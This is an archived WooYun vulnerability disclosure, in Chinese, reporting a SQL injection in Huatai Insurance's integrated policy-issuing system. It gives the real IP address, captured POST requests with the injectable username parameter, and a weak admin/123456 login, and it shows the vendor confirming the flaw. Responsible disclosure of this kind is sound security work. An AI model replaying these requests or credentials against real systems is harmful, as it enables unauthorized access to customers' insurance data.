乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-18: 厂商已经确认,细节仅向厂商公开 2016-01-28: 细节向核心白帽子及相关领域专家公开 2016-02-07: 细节向普通白帽子公开 2016-02-17: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
SQL注射漏洞(支持UNION,百万数据),求20RANK好不好
华泰保险集成出单系统http://202.108.103.161:9999/htcsp/
登录的时候抓包
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getMac HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://202.108.103.161:9999/htcsp/Accept-Language: zh-cnUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 202.108.103.161:9999Content-Length: 15Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=122D50C621DA805034DB8DA6F887A52Ausername=system
百万级
10000+用户
他们的口令全部是弱口令
登录处的注入有以下
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getBranch HTTP/1.1Host: 202.108.103.161:9999Connection: keep-aliveContent-Length: 15Accept: application/json, text/javascript, */*; q=0.01Origin: http://202.108.103.161:9999X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://202.108.103.161:9999/htcsp/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=68FEDD38D5B21C563F64CF28708CD04Cusername=admin
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=loginWelcom HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=loginWelcomAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Content-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveContent-Length: 72Host: 202.108.103.161:9999Pragma: no-cacheCookie: JSESSIONID=122D50C621DA805034DB8DA6F887A52Ausername=admin&password=123456&comcode=&yanzhengma=EW84&yanzhengTrue=false
其实包都差不多,就是多几个少几个参数而已
一切尽在不言中
危害等级:高
漏洞Rank:20
确认时间:2016-01-18 18:34
非常感谢,我们尽快修复
暂无